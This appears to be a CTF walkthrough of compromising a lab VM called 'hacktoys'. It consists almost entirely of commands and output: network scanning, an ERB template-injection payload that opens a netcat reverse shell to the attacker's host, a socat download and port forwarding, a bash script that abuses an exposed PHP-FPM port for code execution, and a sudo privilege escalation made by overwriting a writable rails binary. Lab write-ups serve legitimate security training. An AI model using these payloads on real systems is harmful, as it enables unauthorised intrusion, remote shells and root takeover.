a ctfer on the load

1
┌──(kali㉿kali)-[~]
2
└─$ sudo arp-scan -l
3
Interface: eth0, type: EN10MB, MAC: 12:37:b3:be:69:38, IPv4: 192.168.31.183
4
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
5
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
6
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
7
192.168.31.1    58:ea:1f:38:ff:17       (Unknown)
8
192.168.31.178  08:00:27:23:bb:bb       (Unknown)
9
192.168.31.186  42:60:96:7b:26:bd       (Unknown: locally administered)
10
192.168.31.210  f4:6d:3f:27:e6:fb       (Unknown)
11

12
4 packets received by filter, 0 packets dropped by kernel
13
Ending arp-scan 1.10.0: 256 hosts scanned in 1.873 seconds (136.68 hosts/sec). 4 responded
14

15
┌──(kali㉿kali)-[~]
16
└─$ nmap 192.168.31.178
17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-02 20:19 HKT
18
Nmap scan report for 192.168.31.178
19
Host is up (0.0013s latency).
20
Not shown: 998 closed tcp ports (reset)
21
PORT     STATE SERVICE
22
22/tcp   open  ssh
23
3000/tcp open  ppp
24
MAC Address: 08:00:27:23:BB:BB (Oracle VirtualBox virtual NIC)
25

26
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

1
Product does not exist
2
url
3
https://192.168.31.178:3000/search?query=1&message=Product+does+not+exist

1
https://192.168.31.178:3000/search?query=1&message=%3c%25%3d+7*7+%25%3e
2
回显49
3

4
弹shell
5
<%= system("nc -e /bin/sh 192.168.31.183 4444"); %>

1
lidia@MiWiFi-R4CM-srv:/home$ ss -nltp
2
ss -nltp
3
State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
4
LISTEN 0      511        127.0.0.1:80        0.0.0.0:*
5
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*
6
LISTEN 0      1024         0.0.0.0:3000      0.0.0.0:*    users:(("ruby",pid=427,fd=7))
7
LISTEN 0      4096       127.0.0.1:9000      0.0.0.0:*
8
LISTEN 0      128             [::]:22           [::]:*

1
┌──(kali㉿kali)-[/usr/bin]
2
└─$ python3 -m http.server 8888
3
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
4
192.168.31.178 - - [02/Mar/2025 20:49:41] "GET / HTTP/1.1" 200 -
5
192.168.31.178 - - [02/Mar/2025 20:51:31] "GET /socat HTTP/1.1" 200 -
6

7
lidia@MiWiFi-R4CM-srv:/tmp$ wget http://192.168.31.183:8888/socat
8
wget http://192.168.31.183:8888/socat
9
--2025-03-02 13:51:31--  http://192.168.31.183:8888/socat
10
Connecting to 192.168.31.183:8888... connected.
11
HTTP request sent, awaiting response... 200 OK
12
Length: 530680 (518K) [application/octet-stream]
13
Saving to: ‘socat’
14

15
socat               100%[===================>] 518.24K  --.-KB/s    in 0.02s
16

17
2025-03-02 13:51:31 (24.0 MB/s) - ‘socat’ saved [530680/530680]
18

19
lidia@MiWiFi-R4CM-srv:/tmp$ ls
20
ls
21
index.html
22
socat
23
systemd-private-f6d16d6478584049844ac1ca3ccaef9a-apache2.service-Pkk09d
24
systemd-private-f6d16d6478584049844ac1ca3ccaef9a-systemd-logind.service-ILjViD
25
systemd-private-f6d16d6478584049844ac1ca3ccaef9a-systemd-timesyncd.service-NsgWNx
26
lidia@MiWiFi-R4CM-srv:/tmp$ chmod +x socat
27
chmod +x socat
28

29
(remote) lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:8080,fork TCP4:127.0.0.1:80&
30
[1] 1314
31
(remote) lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,fork TCP4:127.0.0.1:9000&
32
[2] 1318

1
#!/bin/bash
2

3
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
4
FILENAMES="/var/www/html/index.php" # Exisiting file path
5

6
HOST=$1
7
B64=$(echo "$PAYLOAD"|base64)
8

9
for FN in $FILENAMES; do
10
    OUTPUT=$(mktemp)
11
    env -i \
12
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
13
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
14
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT
15

16
    cat $OUTPUT
17
done

1
./exp.sh 192.168.31.178
2
Content-type: text/html; charset=UTF-8
3

4
<!--dodi
5
uid=1001(dodi) gid=1001(dodi) groups=1001(dodi),100(users)
6
-->
7
..........

1
(remote) dodi@hacktoys:/home/dodi$ sudo -l
2
Matching Defaults entries for dodi on hacktoys:
3
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
4

5
User dodi may run the following commands on hacktoys:
6
    (ALL : ALL) NOPASSWD: /usr/local/bin/rvm_rails.sh
7
(remote) dodi@hacktoys:/home/dodi$ cat /usr/local/bin/rvm_rails.sh
8
#!/bin/bash
9
export rvm_prefix=/usr/local
10
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
11
export RUBY_VERSION=ruby-3.1.0
12
export rvm_version=1.29.12
13
export rvm_bin_path=/usr/local/rvm/bin
14
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
15
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
16
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
17
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
18
export rvm_path=/usr/local/rvm
19
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"
20
(remote) dodi@hacktoys:/home/dodi$ ls -la /usr/local/rvm/gems/ruby-3.1.0/bin/rails
21
-rwxrwxr-x 1 root rvm 566 May 20 13:51 /usr/local/rvm/gems/ruby-3.1.0/bin/rails
22
(remote) dodi@hacktoys:/home/dodi$ cat /etc/group | grep rvm
23
rvm:x:1002:lidia,root
24

25
(remote) lidia@hacktoys:/opt/app/gadgets$ echo '/bin/bash' > /usr/local/rvm/gems/ruby-3.1.0/bin/rails